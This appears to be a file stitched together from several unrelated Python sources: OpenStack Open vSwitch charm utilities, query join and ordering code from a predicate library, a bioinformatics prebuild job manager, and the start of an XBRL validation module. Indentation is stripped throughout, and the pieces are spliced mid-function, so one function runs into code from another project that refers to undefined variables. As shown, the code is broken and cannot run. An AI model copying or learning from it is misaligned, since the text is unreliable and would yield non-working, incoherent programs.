# openvswitch via dkms (12.04).
dkms_packages = determine_dkms_package()
if dkms_packages:
apt_install([headers_package()] + dkms_packages, fatal=True)
missing_packages = filter_installed_packages(determine_packages())
if missing_packages:
status_set('maintenance', 'Installing packages')
apt_install(missing_packages,
fatal=True)
if use_dpdk():
enable_ovs_dpdk()
def purge_packages(pkg_list):
purge_pkgs = []
required_packages = determine_packages()
for pkg in pkg_list:
if pkg not in required_packages:
purge_pkgs.append(pkg)
purge_pkgs = filter_missing_packages(purge_pkgs)
if purge_pkgs:
status_set('maintenance', 'Purging unused packages')
apt_purge(purge_pkgs, fatal=True)
apt_autoremove(purge=True, fatal=True)
def determine_packages():
pkgs = []
py3_pkgs = []
plugin_pkgs = neutron_plugin_attribute('ovs', 'packages', 'neutron')
for plugin_pkg in plugin_pkgs:
pkgs.extend(plugin_pkg)
if use_dvr():
pkgs.extend(DVR_PACKAGES)
py3_pkgs.append('python3-neutron-fwaas')
if enable_local_dhcp():
pkgs.extend(DHCP_PACKAGES)
pkgs.extend(METADATA_PACKAGES)
cmp_release = CompareOpenStackReleases(
os_release('neutron-common', base='icehouse',
reset_cache=True))
if cmp_release >= 'mitaka' and 'neutron-plugin-openvswitch-agent' in pkgs:
pkgs.remove('neutron-plugin-openvswitch-agent')
pkgs.append('neutron-openvswitch-agent')
if use_dpdk():
pkgs.append('openvswitch-switch-dpdk')
if enable_sriov():
if cmp_release >= 'mitaka':
pkgs.append('neutron-sriov-agent')
else:
pkgs.append('neutron-plugin-sriov-agent')
if cmp_release >= 'rocky':
pkgs = [p for p in pkgs if not p.startswith('python-')]
pkgs.extend(PY3_PACKAGES)
pkgs.extend(py3_pkgs)
return pkgs
def determine_purge_packages():
cmp_release = CompareOpenStackReleases(
os_release('neutron-common', base='icehouse',
reset_cache=True))
if cmp_release >= 'rocky':
return PURGE_PACKAGES
return []
def register_configs(release=None):
release = release or os_release('neutron-common', base='icehouse')
configs = templating.OSConfigRenderer(templates_dir=TEMPLATES,
openstack_release=release)
for cfg, rscs in resource_map().items():
configs.register(cfg, rscs['contexts'])
return configs
def resource_map():
'''
Dynamically generate a map of resources that will be managed for a single
hook execution.
'''
drop_config = []
resource_map = deepcopy(BASE_RESOURCE_MAP)
if use_dvr():
resource_map.update(DVR_RESOURCE_MAP)
resource_map.update(METADATA_RESOURCE_MAP)
dvr_services = ['neutron-metadata-agent', 'neutron-l3-agent']
resource_map[NEUTRON_CONF]['services'] += dvr_services
if enable_local_dhcp():
resource_map.update(METADATA_RESOURCE_MAP)
resource_map.update(DHCP_RESOURCE_MAP)
metadata_services = ['neutron-metadata-agent', 'neutron-dhcp-agent']
resource_map[NEUTRON_CONF]['services'] += metadata_services
# Remap any service names as required
_os_release = os_release('neutron-common', base='icehouse')
if CompareOpenStackReleases(_os_release) >= 'mitaka':
# ml2_conf.ini -> openvswitch_agent.ini
drop_config.append(ML2_CONF)
# drop of -plugin from service name
resource_map[NEUTRON_CONF]['services'].remove(
'neutron-plugin-openvswitch-agent'
)
resource_map[NEUTRON_CONF]['services'].append(
'neutron-openvswitch-agent'
)
if not use_dpdk():
drop_config.append(DPDK_INTERFACES)
drop_config.append(OVS_DEFAULT)
elif ovs_has_late_dpdk_init():
drop_config.append(OVS_DEFAULT)
else:
drop_config.extend([OVS_CONF, DPDK_INTERFACES])
if enable_sriov():
sriov_agent_name = 'neutron-sriov-agent'
sriov_resource_map = deepcopy(SRIOV_RESOURCE_MAP)
if CompareOpenStackReleases(_os_release) < 'mitaka':
sriov_agent_name = 'neutron-plugin-sriov-agent'
# Patch resource_map for Kilo and Liberty
sriov_resource_map[NEUTRON_SRIOV_AGENT_CONF]['services'] = \
[sriov_agent_name]
resource_map.update(sriov_resource_map)
resource_map[NEUTRON_CONF]['services'].append(
sriov_agent_name)
# Use MAAS1.9 for MTU and external port config on xenial and above
if CompareHostReleases(lsb_release()['DISTRIB_CODENAME']) >= 'xenial':
drop_config.extend([EXT_PORT_CONF, PHY_NIC_MTU_CONF])
for _conf in drop_config:
try:
del resource_map[_conf]
except KeyError:
pass
return resource_map
def restart_map():
'''
Constructs a restart map based on charm config settings and relation
state.
'''
return {k: v['services'] for k, v in resource_map().items()}
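# Illustrative shape only (keys and services vary with config and OpenStack release):
# {NEUTRON_CONF: ['neutron-openvswitch-agent'], OVS_CONF: ['neutron-openvswitch-agent'], ...}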
def services():
"""Returns a list of (unique) services associate with this charm
Note that we drop the os-charm-phy-nic-mtu service as it's not an actual
running service that we can check for.
@returns [strings] - list of service names suitable for (re)start_service()
"""
s_set = set(chain(*restart_map().values()))
s_set.discard('os-charm-phy-nic-mtu')
return list(s_set)
def determine_ports():
"""Assemble a list of API ports for services the charm is managing
@returns [ports] - list of ports that the charm manages.
"""
ports = []
if use_dvr():
ports.append(DVR_RESOURCE_MAP[EXT_PORT_CONF]["ext_port"])
return ports
UPDATE_ALTERNATIVES = ['update-alternatives', '--set', 'ovs-vswitchd']
OVS_DPDK_BIN = '/usr/lib/openvswitch-switch-dpdk/ovs-vswitchd-dpdk'
OVS_DEFAULT_BIN = '/usr/lib/openvswitch-switch/ovs-vswitchd'
# TODO(jamespage): rework back to charmhelpers
def set_Open_vSwitch_column_value(column, value):
"""
Calls ovs-vsctl and sets the 'column=value' in the Open_vSwitch table.
    :param column: column name to set the value for
:param value: value to set
See http://www.openvswitch.org//ovs-vswitchd.conf.db.5.pdf for
details of the relevant values.
    :type value: str
:returns bool: indicating if a column value was changed
:raises CalledProcessException: possibly ovsdb-server is not running
"""
current_value = None
try:
current_value = json.loads(subprocess.check_output(
['ovs-vsctl', 'get', 'Open_vSwitch', '.', column]
))
except subprocess.CalledProcessError:
pass
if current_value != value:
log('Setting {}:{} in the Open_vSwitch table'.format(column, value))
subprocess.check_call(['ovs-vsctl', 'set', 'Open_vSwitch',
'.', '{}={}'.format(column,
value)])
return True
return False
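# Illustrative call of set_Open_vSwitch_column_value() (values are examples
# only); it is roughly equivalent to running
# `ovs-vsctl set Open_vSwitch . other_config:dpdk-init=true`:
#   changed = set_Open_vSwitch_column_value('other_config:dpdk-init', 'true')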
def enable_ovs_dpdk():
'''Enables the DPDK variant of ovs-vswitchd and restarts it'''
subprocess.check_call(UPDATE_ALTERNATIVES + [OVS_DPDK_BIN])
values_changed = []
if ovs_has_late_dpdk_init():
dpdk_context = neutron_ovs_context.OVSDPDKDeviceContext()
other_config = OrderedDict([
('pmd-cpu-mask', dpdk_context.cpu_mask()),
('dpdk-socket-mem', dpdk_context.socket_memory()),
('dpdk-extra',
'--vhost-owner libvirt-qemu:kvm --vhost-perm 0660'),
('dpdk-init', 'true'),
])
for column, value in other_config.items():
values_changed.append(
set_Open_vSwitch_column_value(
'other_config:{}'.format(column),
value
)
)
if ((values_changed and any(values_changed)) and
not is_unit_paused_set()):
service_restart('openvswitch-switch')
def install_tmpfilesd():
'''Install systemd-tmpfiles configuration for ovs vhost-user sockets'''
# NOTE(jamespage): Only do this if libvirt is actually installed
if (init_is_systemd() and
user_exists('libvirt-qemu') and
group_exists('kvm')):
shutil.copy('files/nova-ovs-vhost-user.conf',
'/etc/tmpfiles.d')
subprocess.check_call(['systemd-tmpfiles', '--create'])
def configure_ovs():
status_set('maintenance', 'Configuring ovs')
if not service_running('openvswitch-switch'):
full_restart()
datapath_type = determine_datapath_type()
add_bridge(INT_BRIDGE, datapath_type)
add_bridge(EXT_BRIDGE, datapath_type)
ext_port_ctx = None
if use_dvr():
ext_port_ctx = ExternalPortContext()()
if ext_port_ctx and ext_port_ctx['ext_port']:
add_bridge_port(EXT_BRIDGE, ext_port_ctx['ext_port'])
modern_ovs = ovs_has_late_dpdk_init()
bridgemaps = None
if not use_dpdk():
portmaps = DataPortContext()()
bridgemaps = parse_bridge_mappings(config('bridge-mappings'))
for br in bridgemaps.values():
add_bridge(br, datapath_type)
if not portmaps:
continue
for port, _br in portmaps.items():
if _br == br:
if not is_linuxbridge_interface(port):
add_bridge_port(br, port, promisc=True)
else:
add_ovsbridge_linuxbridge(br, port)
else:
# NOTE: when in dpdk mode, add based on pci bus order
# with type 'dpdk'
bridgemaps = neutron_ovs_context.resolve_dpdk_bridges()
device_index = 0
for pci_address, br in bridgemaps.items():
add_bridge(br, datapath_type)
if modern_ovs:
portname = 'dpdk-{}'.format(
hashlib.sha1(pci_address.encode('UTF-8')).hexdigest()[:7]
)
else:
portname = 'dpdk{}'.format(device_index)
dpdk_add_bridge_port(br, portname,
pci_address)
device_index += 1
if modern_ovs:
bondmaps = neutron_ovs_context.resolve_dpdk_bonds()
bridge_bond_map = DPDKBridgeBondMap()
portmap = parse_data_port_mappings(config('data-port'))
for pci_address, bond in bondmaps.items():
if bond in portmap:
add_bridge(portmap[bond], datapath_type)
portname = 'dpdk-{}'.format(
hashlib.sha1(pci_address.encode('UTF-8'))
.hexdigest()[:7]
)
bridge_bond_map.add_port(portmap[bond], bond,
portname, pci_address)
bond_configs = DPDKBondsConfig()
for br, bonds in bridge_bond_map.items():
for bond, port_map in bonds.items():
dpdk_add_bridge_bond(br, bond, port_map)
dpdk_set_bond_config(
bond,
bond_configs.get_bond_config(bond)
)
target = config('ipfix-target')
bridges = [INT_BRIDGE, EXT_BRIDGE]
if bridgemaps:
bridges.extend(bridgemaps.values())
if target:
for bridge in bridges:
disable_ipfix(bridge)
enable_ipfix(bridge, target)
    else:
        # ipfix target is not set; ensure ipfix is disabled on the bridges
        for bridge in bridges:
            disable_ipfix(bridge)
    catchall = []
root2clauses = {}
# Separate the clauses
for clause in clauses:
roots = [hashable_path(p) for p in clause.roots]
if len(roots) == 1:
root2clauses.setdefault(roots[0],[]).append(clause)
else:
catchall.append(clause)
# Generate clause blocks
clauseblocks = []
for root,clauses in root2clauses.items():
clauseblocks.append(ClauseBlock(clauses))
if catchall: return (clauseblocks, ClauseBlock(catchall))
else: return (clauseblocks, None)
# ------------------------------------------------------------------------------
# To support database-like inner joins. Join conditions are made from
# QCondition objects with the standard comparison operators
# ------------------------------------------------------------------------------
def is_join_qcondition(cond):
if not isinstance(cond, QCondition): return False
spec = StandardComparator.operators.get(cond.operator, None)
if spec is None: return False
return spec.join
# ------------------------------------------------------------------------------
# Validate a join expression. Turns QCondition objects into Join objects. Note:
# joinall (the trueall operator) is used to ensure a connected graph, but such
# joins are then removed as they don't add anything.
# ------------------------------------------------------------------------------
def validate_join_expression(qconds, roots):
jroots = set() # The set of all roots in the join clauses
joins = [] # The list of joins
edges = {} # Edges to ensure a fully connected graph
def add_join(join):
nonlocal edges, joins, jroots
joins.append(join)
jr = set([ hashable_path(r) for r in join.roots])
jroots.update(jr)
if len(jr) != 2:
raise ValueError(("Internal bug: join specification should have "
"exactly two root paths: '{}'").format(jr))
x,y = jr
edges.setdefault(x,[]).append(y)
edges.setdefault(y,[]).append(x)
remain = jr - broots
if remain:
raise ValueError(("Join specification '{}' contains unmatched "
"root paths '{}'").format(jr,remain))
# Check that the join graph is connected by counting the visited nodes from
# some starting point.
def is_connected():
nonlocal edges, joins, jroots
visited = set()
def visit(r):
visited.add(r)
for c in edges[r]:
if c in visited: continue
visit(c)
for start in jroots:
visit(start)
break
return visited == jroots
# Make sure we have a set of hashable paths
try:
broots = set([ hashable_path(root) for root in roots ])
except Exception as e:
raise ValueError(("Invalid predicate paths signature {}: "
"{}").format(roots,e)) from None
if not broots:
raise ValueError(("Specification of join without root paths "
"doesn't make sense"))
for p in broots:
if not p.path.meta.is_root:
raise ValueError(("Invalid field specification {} does not refer to "
"the root of a predicate path ").format(p))
for qcond in qconds:
if not is_join_qcondition(qcond):
if not isinstance(qcond,QCondition):
raise ValueError(("Invalid join element '{}': expecting a "
"comparison specifying the join "
"between two fields").format(qcond))
else:
raise ValueError(("Invalid join operator '{}' in "
"{}").format(qcond.operator,qcond))
add_join(StandardComparator.from_join_qcondition(qcond))
    # Check that the roots used in the joins match the base roots
if jroots != broots:
raise ValueError(("Invalid join specification: missing joins for "
"'{}'").format(broots-jroots))
if not is_connected():
raise ValueError(("Invalid join specification: contains un-joined "
"components '{}'").format(qconds))
    # Now that we've validated the graph we can remove all the pure
    # cross-product/join-all joins.
return list(filter(lambda x: x.operator != trueall, joins))
# ------------------------------------------------------------------------------
# process_join takes a join expression (a list of join statements) from the
# user select statement as well as a list of roots; validates the join
# statements (ensuring that they only refer to paths derived from one of the
# roots) and turns it into a list of validated StandardComparators that have
# paths as both arguments
# ------------------------------------------------------------------------------
def process_join(join_expression, roots=[]):
def _prevalidate():
for j in join_expression:
if not isinstance(j,QCondition):
raise TypeError("'{}' ({}) is not a valid 'join' in '{}'".format(
j,type(j),join_expression))
_prevalidate()
return validate_join_expression(join_expression,roots)
#------------------------------------------------------------------------------
# Specification of an ordering over a field of a predicate/complex-term
#------------------------------------------------------------------------------
class OrderBy(object):
def __init__(self, path, asc):
self._path = path
self._asc = asc
@property
def path(self):
return self._path
@property
def asc(self):
return self._asc
def dealias(self):
dealiased = path(self._path).meta.dealiased
if hashable_path(self._path) == hashable_path(dealiased): return self
return OrderBy(dealiased,self._asc)
def __eq__(self, other):
if not isinstance(other, self.__class__): return NotImplemented
if hashable_path(self._path) != hashable_path(other._path): return False
return self._asc == other._asc
def __ne__(self, other):
result = self.__eq__(other)
if result is NotImplemented: return NotImplemented
return not result
def __hash__(self):
return hash((hashable_path(self._path),self._asc))
def __str__(self):
if self._asc: return "asc({})".format(self._path)
else: return "desc({})".format(self._path)
def __repr__(self):
return self.__str__()
#------------------------------------------------------------------------------
# Helper functions to return an OrderBy in descending or ascending order. Input
# is a PredicatePath. The ascending order function is provided for completeness
# since the order_by parameter will treat a path as ascending order by default.
# ------------------------------------------------------------------------------
def desc(pth):
return OrderBy(path(pth),asc=False)
def asc(pth):
return OrderBy(path(pth),asc=True)
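# Illustrative usage of asc()/desc() (the predicate below is hypothetical):
#   class Person(Predicate):
#       name = StringField
#       age = IntegerField
#   ordering = [desc(Person.age), asc(Person.name)]   # oldest first, then by name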
# ------------------------------------------------------------------------------
# OrderByBlock groups together an ordering of OrderBy statements
# ------------------------------------------------------------------------------
class OrderByBlock(object):
def __init__(self,orderbys=[]):
self._orderbys = tuple(orderbys)
self._paths = tuple([path(ob.path) for ob in self._orderbys])
# if not orderbys:
# raise ValueError("Empty list of order_by statements")
@property
def paths(self):
return self._paths
@property
def roots(self):
return set([hashable_path(p.meta.root) for p in self._paths])
def dealias(self):
neworderbys = tuple([ob.dealias() for ob in self._orderbys])
if self._orderbys == neworderbys: return self
return OrderByBlock(neworderbys)
def __eq__(self, other):
if isinstance(other, self.__class__):
return self._orderbys == other._orderbys
if isinstance(other, tuple):
return self._orderbys == other
if isinstance(other, list):
return self._orderbys == tuple(other)
return NotImplemented
def __ne__(self, other):
result = self.__eq__(other)
if result is NotImplemented: return NotImplemented
return not result
def __len__(self):
return len(self._orderbys)
def __getitem__(self, idx):
return self._orderbys[idx]
def __iter__(self):
return iter(self._orderbys)
def __hash__(self):
return hash(self._orderbys)
def __bool__(self):
return bool(self._orderbys)
def __str__(self):
return "[{}]".format(",".join([str(ob) for ob in self._orderbys]))
def __repr__(self):
return self.__str__()
# ------------------------------------------------------------------------------
# Validate the order_by expression - returns an OrderByBlock
# ------------------------------------------------------------------------------
def validate_orderby_expression(orderby_expressions, roots=[]):
if not is_root_paths(roots):
raise ValueError("roots='{}' must contain only root paths".format(roots))
hroots = set([hashable_path(rp) for rp in roots])
path_ordering = []
# If only a PredicatePath is specified assume ascending order
for exp in orderby_expressions:
if isinstance(exp, OrderBy): path_ordering.append(exp)
elif isinstance(exp, PredicatePath):
path_ordering.append(asc(exp))
elif inspect.isclass(exp) and issubclass(exp, Predicate):
path_ordering.append(asc(path(exp)))
else: raise ValueError("Invalid 'order_by' expression: {}".format(exp))
obb = OrderByBlock(path_ordering)
if not obb.roots.issubset(hroots):
raise ValueError(("Invalid 'order_by' expression '{}' refers to root paths that "
"are not in '{}'").format(obb, hroots))
return obb
# ------------------------------------------------------------------------------
# Return an OrderByBlock corresponding to the validated order by expression
# ------------------------------------------------------------------------------
def process_orderby(orderby_expressions, roots=[]):
return validate_orderby_expression(orderby_expressions,roots)
# ------------------------------------------------------------------------------
# Return an OrderByBlock for an ordered flag
# ------------------------------------------------------------------------------
def process_ordered(roots):
ordering=[asc(r) for r in roots]
return OrderByBlock(ordering)
# ------------------------------------------------------------------------------
# make_prejoin_pair(indexed_paths, clauses)
#
# Given a set of indexed paths and a set of clauses that refer to a single root,
# try to extract a preferred clause that can be used for indexing.
#
# - indexed_paths - a list of paths for which there is a factindex
# - clauses - a clause block that can only refer to a single root
# ------------------------------------------------------------------------------
def make_prejoin_pair(indexed_paths, clauseblock):
def preference(cl):
c = min(cl, key=lambda c: c.preference)
return c.preference
def is_candidate_sc(indexes, sc):
if len(sc.paths) != 1: return False
return hashable_path(sc.paths[0].meta.dealiased) in indexes
def is_candidate(indexes, cl):
for c in cl:
if not isinstance(c, StandardComparator): return False
if not is_candidate_sc(indexes,c): return False
return True
if not clauseblock: return (None,None)
tmp = set([hashable_path(p.meta.dealiased) for p in clauseblock.paths])
indexes = set(filter(lambda x: x in tmp,
[hashable_path(p) for p in indexed_paths]))
# Search for a candidate to use with a fact index
keyclause = None
candidates = []
rest = []
for cl in clauseblock:
if is_candidate(indexes, cl): candidates.append(cl)
else: rest.append(cl)
if not candidates: return (None, clauseblock)
# order the candidates by their comparator preference and take the first
candidates.sort(key=lambda cl : preference(cl), reverse=True)
rest.extend(candidates[1:])
cb = ClauseBlock(rest) if rest else None
return (candidates[0],cb)
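# Worked example (illustrative): with a fact index on P.a and the clause block
# [ P.a == 3, P.b < 4 ], the first clause is a usable index candidate, so the
# pair returned is (P.a == 3, ClauseBlock([P.b < 4])); if no clause can use an
# index, the whole block is returned unchanged as (None, clauseblock).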
# ------------------------------------------------------------------------------
# make_join_pair(joins, clauseblock)
# - a list of join StandardComparators
# - an existing clauseblock (or None)
# - a list of orderby statements
#
# Takes a list of joins and picks the best one for indexing (based on their
# operator preference and the orderby statements). Returns a pair that is the
# chosen join and the rest of the joins added to the input clauseblock.
# ------------------------------------------------------------------------------
def make_join_pair(joins, clauseblock, orderbys=[]):
opaths=set([hashable_path(ob.path) for ob in orderbys])
def num(sc):
return len(opaths & (set([hashable_path(p) for p in sc.paths])))
if not joins: return (None,clauseblock)
joins = sorted(joins, key=lambda x : (x.preference, num(x)), reverse=True)
joinsc = joins[0]
remainder = joins[1:]
if remainder:
remainder = ClauseBlock([Clause([sc]) for sc in remainder])
if clauseblock: return (joinsc, clauseblock + remainder)
else: return (joinsc, remainder)
else:
if clauseblock: return (joinsc, clauseblock)
else: return (joinsc, None)
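# Worked example (illustrative): given joins [ P.a == F.a, P.b < F.b ], the
# equality join is normally preferred (higher operator preference, boosted
# further if an order_by touches its paths); it becomes the returned join key
# while P.b < F.b is folded into the returned clause block.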
# ------------------------------------------------------------------------------
# JoinQueryPlan support functions. The JQP is a part of the query plan that
# describes the plan to execute a single link in a join.
# ------------------------------------------------------------------------------
# Check that the formula only refers to paths with the allowable roots
def _check_roots(allowable_roots, formula):
if not formula: return True
allowable_hroots = set([hashable_path(rp) for rp in allowable_roots])
    hroots = set([hashable_path(rp) for rp in formula.roots])
    return hroots.issubset(allowable_hroots)
<reponame>MarcoMernberger/mbf_externals
"""
Many algorithms need prebuilt data structures (indices and so on)
which are both too time-consuming to build and too big to copy to each
experiment, and which need to be versioned,
but they can often be shared among versions."""
import socket
from .util import Version, sort_versions, UpstreamChangedError, write_md5_sum
import pypipegraph as ppg
from pathlib import Path
import time
import stat
import os
import json
class PrebuildFunctionInvariantFileStoredExploding(ppg.FunctionInvariant):
def __init__(self, storage_filename, func):
self.is_prebuild = True
super().__init__(storage_filename, func)
@classmethod
def hash_function(cls, function):
new_source, new_funchash, new_closure = cls._hash_function(function)
return cls._compare_new_and_old(new_source, new_funchash, new_closure, False)
def _get_invariant(self, old, all_invariant_stati):
stf = Path(
self.job_id
) # the old file format - using just the function's dis-ed code.
stf2 = Path(self.job_id).with_name(
stf.name + "2"
) # the new style, dict based storage just like FunctionInvariant after 0.190
new_source, new_func_hash, new_closure = self._hash_function(self.function)
if stf2.exists():
old_hash = json.loads(stf2.read_text())
elif stf.exists():
old_hash = stf.read_text()
new_closure = ""
else:
new_value = self._compare_new_and_old(
new_source, new_func_hash, new_closure, False
)
stf2.write_text(json.dumps(new_value))
return old # signal no change necessary.
try:
new_hash = self._compare_new_and_old(
new_source, new_func_hash, new_closure, old_hash
)
if new_hash != old_hash:
self.complain_about_hash_changes(new_hash)
else:
return old
except ppg.NothingChanged as e:
# we accept the stuff there as no change.
# and we write out the new value, because it might be a format change.
try:
stf2.write_text(json.dumps(e.new_value))
except OSError as e2:
if "Read-only file system" in str(e2):
import warnings
warnings.warn(
"PrebuildFunctionInvariantFileStoredExploding: Could not update %s to newest version - read only file system"
% stf
)
raise e
raise NotImplementedError("Should not happen")
def complain_about_hash_changes(self, invariant_hash):
stf = Path(self.job_id)
try:
of = stf.with_name(stf.name + ".changed")
of.write_text(json.dumps(invariant_hash))
except IOError: # noqa: E722 pragma: no cover
# fallback if the stf directory is not writeable.
of = Path(stf.name + ".changed") # pragma: no cover
of.write_text(json.dumps(invariant_hash)) # pragma: no cover
raise UpstreamChangedError(
(
"Calculating function changed.\n"
"If you are actively working on it, you need to bump the version:\n"
"If not, you need to figure out what's causing the change.\n"
"Do not nuke the job info (%s) light heartedly\n"
"To compare, run \n"
"icdiff %s %s"
)
% (self.job_id, Path(self.job_id).absolute(), of.absolute())
)
class _PrebuildFileInvariantsExploding(ppg.MultiFileInvariant):
"""Used by PrebuildJob to handle input file deps"""
def __new__(cls, job_id, filenames):
job_id = "PFIE_" + str(job_id)
return ppg.Job.__new__(cls, job_id)
def __init__(self, job_id, filenames):
job_id = "PFIE_" + str(job_id)
self.filenames = filenames
for f in filenames:
if not (isinstance(f, str) or isinstance(f, Path)): # pragma: no cover
raise ValueError(f"filenames must be str/path. Was {repr(f)}")
self.is_prebuild = True
ppg.Job.__init__(self, job_id)
def calc_checksums(self, old):
"""return a list of tuples
(filename, filetime, filesize, checksum)"""
result = []
if old:
old_d = {x[0]: x[1:] for x in old}
else:
old_d = {}
for fn in self.filenames:
if not os.path.exists(fn):
result.append((fn, None, None, None))
else:
st = os.stat(fn)
filetime = st[stat.ST_MTIME]
filesize = st[stat.ST_SIZE]
if (
fn in old_d
and (old_d[fn][0] == filetime)
and (old_d[fn][1] == filesize)
): # we can reuse the checksum
result.append((fn, filetime, filesize, old_d[fn][2]))
else:
result.append((fn, filetime, filesize, ppg.util.checksum_file(fn)))
return result
def _get_invariant(self, old, all_invariant_stati):
if not old:
old = self.find_matching_renamed(all_invariant_stati)
checksums = self.calc_checksums(old)
if old is False:
raise ppg.ppg_exceptions.NothingChanged(checksums)
# elif old is None: # not sure when this would ever happen
# return checksums
else:
old_d = {x[0]: x[1:] for x in old}
checksums_d = {x[0]: x[1:] for x in checksums}
for fn in self.filenames:
if old_d[fn][2] != checksums_d[fn][2] and old_d[fn][2] is not None:
raise UpstreamChangedError(
"""Upstream file changed for job, bump version or rollback.
Job: %s
File: %s"""
% (self, fn)
)
# return checksums
raise ppg.ppg_exceptions.NothingChanged(checksums)
class PrebuildJob(ppg.MultiFileGeneratingJob):
def __new__(cls, filenames, calc_function, output_path):
if not hasattr(filenames, "__iter__"):
raise TypeError("filenames was not iterable")
for x in filenames:
if not (isinstance(x, str) or isinstance(x, Path)):
raise TypeError("filenames must be a list of strings or pathlib.Path")
for of in filenames:
if of.is_absolute():
raise ValueError("output_files must be relative")
filenames = cls._normalize_output_files(filenames, output_path)
job_id = ":".join(sorted(str(x) for x in filenames))
res = ppg.Job.__new__(cls, job_id)
res.filenames = filenames
res.output_path = Path(output_path)
return res
@classmethod
def _normalize_output_files(cls, output_files, output_path):
output_files = [
Path(cls.verify_job_id(output_path / of)) for of in output_files
]
output_files.append(Path(cls.verify_job_id(output_path / "mbf.done")))
return output_files
def __init__(self, output_files, calc_function, output_path):
output_files = self._normalize_output_files(output_files, output_path)
output_path.mkdir(parents=True, exist_ok=True)
self.real_callback = calc_function
self.is_prebuild = True
def calc():
self.real_callback(output_path)
output_files[-1].write_text(str(time.time()))
for fn in output_files[:-1]:
if os.path.exists(fn):
write_md5_sum(fn)
super().__init__(output_files, calc, rename_broken=True, empty_ok=True)
self.output_path = output_path
def depends_on_func(self, name, func):
job = PrebuildFunctionInvariantFileStoredExploding(
self.output_path / ("%s.md5sum" % (name,)), func
)
self.depends_on(job)
return job
def depends_on_file(self, filename):
job = _PrebuildFileInvariantsExploding(filename, [filename])
self.depends_on(job)
return job
def depends_on(self, jobs):
for job in ppg.util.flatten_jobs(jobs):
if not hasattr(job, "is_prebuild") or not job.is_prebuild:
raise ppg.JobContractError(
"%s depended on a non-prebuild dependency %s - not supported"
% (self, job)
)
ppg.Job.depends_on(self, job)
return self
def inject_auto_invariants(self):
self.depends_on_func("mbf_func", self.real_callback)
def invalidated(self, reason):
exists = [Path(of).exists() for of in self.filenames]
if all(exists) or not any(exists):
pass
else:
raise ValueError(
"Some output files existed, some don't - undefined state, manual cleanup needed\n:%s"
% (list(zip(self.filenames, exists)))
)
self.was_invalidated = True
def name_file(self, output_filename):
"""Adjust path of output_filename by job path"""
return self.output_path / output_filename
def find_file(self, output_filename):
"""Search for a file named output_filename in the job's known created files"""
of = self.name_file(output_filename)
for fn in self.filenames:
if of.resolve() == Path(fn).resolve():
return of
else:
raise KeyError("file not found: %s" % output_filename)
class PrebuildManager:
def __init__(self, prebuilt_path, hostname=None):
self.prebuilt_path = Path(prebuilt_path)
self.hostname = hostname if hostname else socket.gethostname()
(self.prebuilt_path / self.hostname).mkdir(exist_ok=True)
def _find_versions(self, name):
result = {}
dirs_to_consider = [
p
for p in self.prebuilt_path.glob("*")
if (p / name).exists() and p.name != self.hostname
]
# prefer versions from this host - must be last!
dirs_to_consider.append(self.prebuilt_path / self.hostname)
for p in dirs_to_consider:
for v in (p / name).glob("*"):
if (v / "mbf.done").exists():
result[v.name] = v
return result
def prebuild( # noqa: C901
self,
name,
version,
input_files,
output_files,
calculating_function,
minimum_acceptable_version=None,
maximum_acceptable_version=None,
further_function_deps={},
):
"""Create a job that will prebuilt the files if necessary
@further_function_deps is a dictionary name => func,
and will end up as PrebuildFunctionInvariantFileStoredExploding
in the correct directory
"""
if minimum_acceptable_version is None:
minimum_acceptable_version = version
available_versions = self._find_versions(name)
if version in available_versions:
output_path = available_versions[version]
else:
# these are within minimum..maximum_acceptable_version
acceptable_versions = sort_versions(
[
(v, p)
for v, p in available_versions.items()
if (
(Version(v) >= minimum_acceptable_version)
and (
maximum_acceptable_version is None
or (Version(v) < maximum_acceptable_version)
)
)
]
)
ok_versions = []
(
new_source,
new_funchash,
new_closure,
) = ppg.FunctionInvariant._hash_function(calculating_function)
for v, p in acceptable_versions:
func_md5sum_path = p / "mbf_func.md5sum"
func_md5sum_path2 = p / "mbf_func.md5sum2"
try:
func_md5sum = json.loads(func_md5sum_path2.read_text())
except OSError:
func_md5sum = func_md5sum_path.read_text()
ok = False
try:
new = ppg.FunctionInvariant._compare_new_and_old(
new_source, new_funchash, new_closure, func_md5sum
)
ok = False
except ppg.NothingChanged:
ok = True
if ok:
ok_versions.append((v, p))
if ok_versions:
version, output_path = ok_versions[-1]
else: # no version that is within the acceptable range and had the same build function
output_path = self.prebuilt_path / self.hostname / name / version
if isinstance(output_files, (str, Path)):
output_files = [output_files]
output_files = [Path(of) for of in output_files]
if ppg.inside_ppg():
job = PrebuildJob(output_files, calculating_function, output_path)
job.depends_on(_PrebuildFileInvariantsExploding(output_path, input_files))
job.version = version
return job
else:
for of in output_files:
if not (output_path / of).exists():
raise ValueError(
"%s was missing and prebuild used outside of ppg - can't build it"
% (output_path / of).absolute()
)
class DummyJob:
"""just enough of the Jobs interface to ignore the various calls
and allow finding the msgpack jobs
"""
def __init__(self, output_path, filenames):
self.output_path = output_path
self.filenames = PrebuildJob._normalize_output_files(
filenames, output_path
)
# self.job_id = ":".join(sorted(str(x) for x in filenames))
def depends_on(self, _other_job): # pragma: no cover
return self
def depends_on_func(self, _name, _func): # pragma: no cover
return self
def depends_on_file(self, _filename): # pragma: no cover
return self
def name_file(self, output_filename):
"""Adjust path of output_filename by job path"""
return self.output_path / output_filename
def find_file(self, output_filename):
"""Search for a file named output_filename in the job's known created files"""
of = self.name_file(output_filename)
for fn in self.filenames:
if of.resolve() == Path(fn).resolve():
return of
else:
raise KeyError("file not found: %s" % output_filename)
def __iter__(self):
yield self
return DummyJob(output_path, output_files)
_global_manager = None
def change_global_manager(new_manager):
    global _global_manager
    _global_manager = new_manager
<filename>arelle/XmlValidate.py
'''
Created on Feb 20, 2011
@author: Mark V Systems Limited
(c) Copyright 2011 Mark V Systems Limited, All rights reserved.
'''
import os, logging
from lxml import etree
try:
from regex import compile as re_compile
except ImportError:
from re import compile as re_compile
from decimal import Decimal, InvalidOperation
from fractions import Fraction
from arelle import XbrlConst, XmlUtil
from arelle.ModelValue import (qname, qnameEltPfxName, qnameClarkName, qnameHref,
dateTime, DATE, DATETIME, DATEUNION,
anyURI, INVALIDixVALUE, gYearMonth, gMonthDay, gYear, gMonth, gDay, isoDuration)
from arelle.ModelObject import ModelObject, ModelAttribute
from arelle.PythonUtil import strTruncate
from arelle import UrlUtil
validateElementSequence = None #dynamic import to break dependency loops
modelGroupCompositorTitle = None
ModelInlineValueObject = None
ixMsgCode = None
UNVALIDATED = 0 # note that these values may be used as constants in code for better efficiency
UNKNOWN = 1
INVALID = 2
NONE = 3
VALID = 4 # values >= VALID are valid
VALID_ID = 5
VALID_NO_CONTENT = 6 # may be a complex type with children, must be last (after VALID with content enums)
